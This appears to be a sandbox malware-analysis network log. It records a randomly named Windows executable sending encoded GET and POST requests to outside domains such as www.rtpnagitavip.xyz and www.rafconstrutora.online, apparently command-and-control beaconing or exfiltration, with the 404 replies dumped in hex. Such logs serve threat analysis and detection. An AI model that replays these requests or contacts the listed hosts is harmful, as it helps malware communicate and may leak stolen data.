3DkHhn=3Xd6viqbBn9XNrmmCefnId03+CkP5rQpGw45HxlL5BqqUT4shvvnnXXymPHDibY+EH+T8dMvJldExt+dQMrgDe+mNwy/5jC0CJQKUCUmDy1iE++/l7iqzYger4DGkc2/Ia4t7kLfwKEGc08KsiIbvOHFxLrt4uwKBcLVjSs4uK3Nos4APWKN8fR5DqIVaNaczSrTzu4WjiKY8IWAhF5A/LqO5FMNd+TlQnF3p/Jgr+d2yhhKQqnWaB6X4cTecMOv/dklKK+DdwVCGFSEz1Ty0tsO3OcbFv9puOBLZ6ZDHuBaA+3c9QtEuwICqz/p6GS374JpnDYkXihLM5qS++XcWtGwzRF9k3aKiL8L6foxML0bJMnbXL5z2+TJM9AgCRuVgkppC4uqOUKqMNo6WEI05tDcBgNzAXWD1+yHhjetOs+x3zMliYjq+73NqCIIzm2B95ZUAJJshHpndoKUw78k58Kkij+GYqlGbABKc2oQIppcscCOuUH3foH3Z52KoqVdAvm5c8ahKd6RzxUrIbcCEcuQwehHTfAD9Pw2/0l6toLATCZVLzq20/Tc3xVZbyaf6VLyy2r5j9Y6ATw4iLM7Ut35imBHZV/RmJU81dcgH18mbvi4EsoxBCcYy6EJeHTQMYr9h/zbWSNqAYvDqO92MV47ZckvnF9LFMpio9t1RYXDxZAOCEd3KvL2wpGgzvtlsbnzNrmXXci2CqQrJOvcQjVHUivzkhC6bK8P66eoab6YJoTd6v4WOPiso46EPlVhRO985iHJdx9tQREU0TWvqGQCyeIwbggiF2Yr5prrAilFiexL2RLeCK4g5uKA5kQewVy74OpmPJHgBU9d+BfmyjJeEX+vNlOaBKwPNqSyoNwggMD5+AaU5LNFPuBp5DBshOdu6dTVCz9ZCEVw9qIu5afLYFURoV+8JHtGOmEMCC4mAgiv7YVjboFbI/I+jGXruT1UZAX5SQsKrJ0BcfJ3PfUVh71OHVmyDn+UMbU1aLlzn [TRUNCATED]
Jan 11, 2025 09:22:22.641765118 CET	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 08:22:22 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT Vary: Accept-Encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JaYi7XKrZTSo2LX7lk9JjMDMCKr8DvTR6YXNs6NCa28YUznVpR0nwLLRcjOs3wtQHEmyoAD9pNw08zLbUXdXSDE%2B1RHdarJCXvk7ScNDXS0f8KR456nCFJecP2XcBI4voXn%2FiyC52xHYwdJh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90037fa6dc9b4344-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1729&min_rtt=1729&rtt_var=864&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1785&delivery_rate=0&cwnd=45&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 33 34 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 96 cd 6e db 46 10 c7 ef 01 f2 0e e3 3d 7b 45 91 b2 be 0a 92 40 eb b8 49 2f 4d d0 26 40 7b 2a 56 cb 11 b9 28 b9 43 ef 2c 29 ba 6f 63 f4 10 a0 40 9f 42 2f 56 50 51 24 51 71 5a b8 f6 89 3b dc 99 df cc 1f c3 dd 61 7c f1 ea ed f5 fb 5f df dd 40 e1 ab 32 7d f9 22 ee 9f 50 2a 9b 27 a2 f6 f2 bb 9f 44 fa f2 05 40 5c a0 ca 76 2b 80 b8 42 af 40 17 ca 31 fa 44 7c 78 ff bd 5c 88 c1 5e e1 7d 2d f1 b6 31 6d 22 7e 91 1f be 95 d7 54 d5 ca 9b 55 89 02 34 59 8f d6 27 e2 87 9b 04 b3 1c 87 a1 56 55 98 88 d6 e0 a6 26 e7 4f bc 37 26 f3 45 92 61 6b 34 ca 9d 71 09 c6 1a 6f 54 29 59 ab 12 93 f0 21 d2 9a 5c a5 bc cc d0 a3 f6 86 ec 09 d1 63 89 75 41 16 13 4b 0f 85 3a 5a 91 e7 93 00 4b c6 66 d8 1d 7c bd f1 25 a6 6f 88 6b cc 54 8e 15 64 08 3f 1b 8f a0 a9 82 57 54 6d ff b6 86 e0 b5 db de 7b c3 20 e1 0d b1 7f ad 3c b9 38 f8 14 ba e7 94 c6 fe 0e 0e cb 44 70 41 ce eb c6 83 d1 7d a9 85 c3 75 22 02 9d 1b c9 77 1c 98 4a e5 c8 c1 5a b5 fd f6 61 31 32 fa 58 ff 91 f5 18 84 9c 44 a3 da e6 02 [TRUNCATED] Data Ascii: 34bnF={E@I/M&@{V(C,)oc@B/VPQ$QqZ;a\|_@2}"P'D@\v+B@1D\|x\^}-1m"~TU4Y'VU&O7&Eak4qoT)Y!\cuAK:ZKf\|%okTd?WTm{ <8DpA}u"wJZa12XDIM2s:2s>
Jan 11, 2025 09:22:22.641815901 CET	488	IN	Data Raw: a7 32 97 43 e6 72 d6 2d 9f cc 0c a3 c5 00 1a 46 8b 2e 8c 16 e2 99 5a 2e c3 e5 b0 61 e1 32 ea c2 e5 43 2d 53 75 5d a2 f4 d4 e8 42 3e 52 c2 f8 4c c2 b8 0b a3 f1 b3 a6 98 9e a9 98 46 5d 38 7d 5e 15 8b 33 15 8b 71 17 2e ce 54 9c b1 34 73 b0 22 f2 ec Data Ascii: 2Cr-F.Z.a2C-Su]B>RLF]8}^3q.T4s"G#,w%r&=U]%>r343-R1'kWq_eAJNO=0Io#_A19#ok\O}NU;dVPoscEWCp wVKz =

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49713	104.21.32.1	80	3756	C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:22:24.691960096 CET	473	OUT	GET /sa6l/?3DkHhn=6V1asWS7bHNCa/2zAtOgIvo5xGUX2YN7Fz16JDlX+WOPPCMQtYaavk317PXImbN/OUG48/wNZlwOwdeReLWvD6PYMjqtuTDNT7c8ZTd5cxBCZsjQlYSG4pUhurPexOX1dg==&jH4x=86JHl HTTP/1.1 Host: www.rafconstrutora.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Jan 11, 2025 09:22:25.202689886 CET	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 08:22:25 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT Vary: Accept-Encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N107vfs0mJNbNEvYNqK0xIo6SpazgXh6tjD57hA0gb0RYyVObszpk8BdkZHRjjGClplTLoBx2FXIpfI9IFrEHEk0ulvN4ydw1Z%2BRsgZgw6YQ4dKe6r7%2Bp29%2BRBj36yqfQbUrx6Bj0Eswwf%2FF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90037fb6d98841a6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1545&min_rtt=1545&rtt_var=772&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=473&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 33 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 73 70 65 64 61 67 65 6d [TRUNCATED] Data Ascii: 939<!DOCTYPE html><html lang="pt-BR"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="format-detection" content="telephone=no"> <meta name="robots" content="noindex"> <title>Hospedagem de Site com Domnio Grtis - HostGator</title>
Jan 11, 2025 09:22:25.202733994 CET	224	IN	Data Raw: 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 20 20 20 20 Data Ascii: <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon.ico"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-32.png" sizes="32x32"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-57
Jan 11, 2025 09:22:25.202748060 CET	1236	IN	Data Raw: 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 35 37 78 35 37 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d Data Ascii: .png" sizes="57x57"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-76.png" sizes="76x76"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-96.png" sizes="96x96"> <link rel="icon" href="/cgi-sys/images/favicons/f
Jan 11, 2025 09:22:25.202764034 CET	526	IN	Data Raw: 65 67 75 69 75 20 75 6d 20 6c 69 6e 6b 20 76 c3 a1 6c 69 64 6f 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 73 74 67 61 74 6f 72 2e 63 6f 6d 2e 62 72 22 20 74 69 74 6c 65 Data Ascii: eguiu um link vlido.</p> <a href="https://www.hostgator.com.br" title="HostGator">Conhea-nos!</a> <div class="logo"> <img src="/cgi-sys/images/logo-hostgator.svg" alt="HostGator"> </div>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49714	172.96.191.238	80	3756	C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:22:31.007671118 CET	733	OUT	POST /27lg/ HTTP/1.1 Host: www.rtpnagitavip.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.rtpnagitavip.xyz Referer: http://www.rtpnagitavip.xyz/27lg/ Connection: close Content-Length: 207 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 33 44 6b 48 68 6e 3d 61 46 31 5a 2b 78 72 74 46 6c 63 34 54 37 47 2b 2b 58 4a 78 54 47 56 4f 65 47 78 34 39 53 69 54 56 69 75 2b 33 4c 79 56 47 63 7a 62 39 67 68 2b 5a 61 58 44 70 53 69 35 74 31 45 30 56 72 78 7a 30 69 56 35 54 75 6e 6a 67 50 4c 75 52 68 56 74 48 71 39 6e 61 36 76 34 42 50 2b 47 7a 64 33 6c 6b 64 77 75 38 6e 58 63 74 34 56 79 6c 78 57 49 31 37 54 5a 50 4a 55 6b 66 62 44 33 75 6d 6d 53 52 4a 4b 50 58 4c 2f 52 54 5a 6b 63 2b 52 31 44 48 66 52 6e 63 4d 49 43 6f 73 63 66 43 65 32 77 77 31 38 47 6d 32 62 37 4a 6a 77 47 68 46 42 41 56 77 49 34 39 49 6a 53 6c 63 67 45 7a 63 2f 35 67 7a 72 2b 66 61 49 3d Data Ascii: 3DkHhn=aF1Z+xrtFlc4T7G++XJxTGVOeGx49SiTViu+3LyVGczb9gh+ZaXDpSi5t1E0Vrxz0iV5TunjgPLuRhVtHq9na6v4BP+Gzd3lkdwu8nXct4VylxWI17TZPJUkfbD3ummSRJKPXL/RTZkc+R1DHfRncMICoscfCe2ww18Gm2b7JjwGhFBAVwI49IjSlcgEzc/5gzr+faI=
Jan 11, 2025 09:22:31.886207104 CET	1033	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Sat, 11 Jan 2025 08:22:31 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49715	172.96.191.238	80	3756	C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:22:33.556636095 CET	753	OUT	POST /27lg/ HTTP/1.1 Host: www.rtpnagitavip.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.rtpnagitavip.xyz Referer: http://www.rtpnagitavip.xyz/27lg/ Connection: close Content-Length: 227 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 33 44 6b 48 68 6e 3d 61 46 31 5a 2b 78 72 74 46 6c 63 34 53 61 32 2b 38 30 78 78 57 6d 56 50 62 47 78 34 33 79 6a 61 56 69 69 2b 33 49 2b 46 47 76 58 62 39 43 70 2b 59 62 58 44 75 53 69 35 6e 56 45 31 52 72 78 43 30 69 49 4d 54 73 6a 6a 67 50 33 75 52 68 46 74 62 4a 6c 6b 49 36 76 36 61 66 2b 45 2b 39 33 6c 6b 64 77 75 38 6a 48 69 74 38 35 79 6b 43 65 49 31 5a 72 57 4d 4a 55 6e 57 37 44 33 71 6d 6d 57 52 4a 4c 59 58 50 66 76 54 62 73 63 2b 51 46 44 47 4c 46 6b 4a 38 4a 4c 32 63 63 42 43 75 33 65 78 31 55 6f 6a 33 4c 4f 42 52 4e 79 6b 7a 77 71 50 53 41 2b 2b 49 4c 35 6c 66 49 79 32 72 69 52 36 51 37 4f 42 4e 64 69 75 37 31 6c 5a 56 4b 71 4c 32 61 68 55 6d 4b 51 68 2b 44 2f Data Ascii: 3DkHhn=aF1Z+xrtFlc4Sa2+80xxWmVPbGx43yjaVii+3I+FGvXb9Cp+YbXDuSi5nVE1RrxC0iIMTsjjgP3uRhFtbJlkI6v6af+E+93lkdwu8jHit85ykCeI1ZrWMJUnW7D3qmmWRJLYXPfvTbsc+QFDGLFkJ8JL2ccBCu3ex1Uoj3LOBRNykzwqPSA++IL5lfIy2riR6Q7OBNdiu71lZVKqL2ahUmKQh+D/
Jan 11, 2025 09:22:34.465711117 CET	1033	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Sat, 11 Jan 2025 08:22:34 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49716	172.96.191.238	80	3756	C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:22:36.107708931 CET	1770	OUT	POST /27lg/ HTTP/1.1 Host: www.rtpnagitavip.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.rtpnagitavip.xyz Referer: http://www.rtpnagitavip.xyz/27lg/ Connection: close Content-Length: 1243 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 33 44 6b 48 68 6e 3d 61 46 31 5a 2b 78 72 74 46 6c 63 34 53 61 32 2b 38 30 78 78 57 6d 56 50 62 47 78 34 33 79 6a 61 56 69 69 2b 33 49 2b 46 47 76 66 62 39 33 39 2b 5a 38 37 44 76 53 69 35 6b 56 45 6f 52 72 78 6c 30 69 51 49 54 73 2f 7a 67 4b 7a 75 54 43 39 74 4c 34 6c 6b 53 71 76 36 46 50 2b 46 7a 64 33 56 6b 64 67 71 38 6e 62 69 74 38 35 79 6b 44 4f 49 79 4c 54 57 4b 4a 55 6b 66 62 44 37 75 6d 6e 42 52 50 69 74 58 4a 43 55 53 72 4d 63 2f 77 56 44 42 34 39 6b 4c 63 4a 46 33 63 64 53 43 75 37 64 78 31 59 65 6a 33 2b 56 42 53 64 79 6b 46 6f 30 55 79 5a 6a 6f 37 44 4a 6f 74 73 6c 74 59 71 69 30 77 44 56 63 63 78 47 6e 73 4a 75 61 30 6d 71 4f 58 32 6f 49 43 4b 2b 75 70 4f 72 54 4a 62 71 39 64 2f 61 66 6e 6b 4c 30 57 76 71 39 2b 32 52 65 69 73 52 4a 58 6a 37 6b 52 6c 7a 64 31 4d 75 6e 30 50 56 44 44 34 35 55 55 4c 68 74 31 71 7a 75 38 33 4d 74 42 33 53 57 70 47 2b 73 58 6f 6e 55 38 59 74 77 55 71 67 48 4a 36 35 6b 45 37 71 43 57 69 39 75 61 6f 73 49 62 7a 69 4e 44 55 71 62 57 77 6f 6b 54 41 4b 2f 6a 39 [TRUNCATED] Data Ascii: 3DkHhn=aF1Z+xrtFlc4Sa2+80xxWmVPbGx43yjaVii+3I+FGvfb939+Z87DvSi5kVEoRrxl0iQITs/zgKzuTC9tL4lkSqv6FP+Fzd3Vkdgq8nbit85ykDOIyLTWKJUkfbD7umnBRPitXJCUSrMc/wVDB49kLcJF3cdSCu7dx1Yej3+VBSdykFo0UyZjo7DJotsltYqi0wDVccxGnsJua0mqOX2oICK+upOrTJbq9d/afnkL0Wvq9+2ReisRJXj7kRlzd1Mun0PVDD45UULht1qzu83MtB3SWpG+sXonU8YtwUqgHJ65kE7qCWi9uaosIbziNDUqbWwokTAK/j9QAydRVTysISprUjPmYOAIpYJOcyuGE0aIE3JJxw7qjAV34pH+zju84dzGRYttZmf54K3+14kTL0Mhnz4ST4sCMFxxjY3riIKmsx0yGAjGZzsCbidlVLJFQSfu8EuFVlXNuQiwoVd/4xJ9ucfKU+CAVoMtgnSgb8tsdzEvA9t70ZzW09jVfb6lHCxSf9TXgOKkE/zeSKgBdyXAmuHJ5VjMT5fsI0qNX+5g1G2h1hWP/KZ6MeczUYr7FvOZSWTePblSxLh/2RYoaStL+gkqiFrslW931A3kmijA7dua/MEpnTkeg4r6W6fzSR53BP7kADjoK6wmA598ly0UCxqdo82/eSPdyFPZQbC0INBs/zY89/XihohfDyuUpTfwQPkyn1wnrw70ujWd3t7Zn4T4v/xyQvNfBdt/wqgcM24v91TcegcVSNpMz/ZwAKLmbg+kWeK0FUoIfJ0K3voxqiCzNarOmjYJ32ivPkLGS7tzW5AY7P6qQYfc+NvzPFgm0fWTo9vTnmzLerIilQdndlaNqaZwFiPO5RJ0/9MXoHm6Tzhm4DF9KcFDDElWEAiWBfM4CA1pum5NE7k7f2WkJZvjNb9OFQm4zJVn3gU85QHpgc5EEjUAaweUsp4j6xPP46HXffyS7MzgA3nGMdWuAAg7j/vw6rFuyS7KBwU3V [TRUNCATED]
Jan 11, 2025 09:22:36.990885019 CET	1033	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Sat, 11 Jan 2025 08:22:36 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49718	172.96.191.238	80	3756	C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:22:38.644262075 CET	468	OUT	GET /27lg/?jH4x=86JHl&3DkHhn=XHd59GHbUnAySavE+VYtb0oRW1QdwhWNcR79gJCiA4T47CJUdda4m3KOv2gLYrZW1RokSNrWwPitVihkA4IERdP5BfSklenz4vUF3jCdjthznzOB1JrNNJokaKrslHPJFg== HTTP/1.1 Host: www.rtpnagitavip.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; QTAQZ3 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
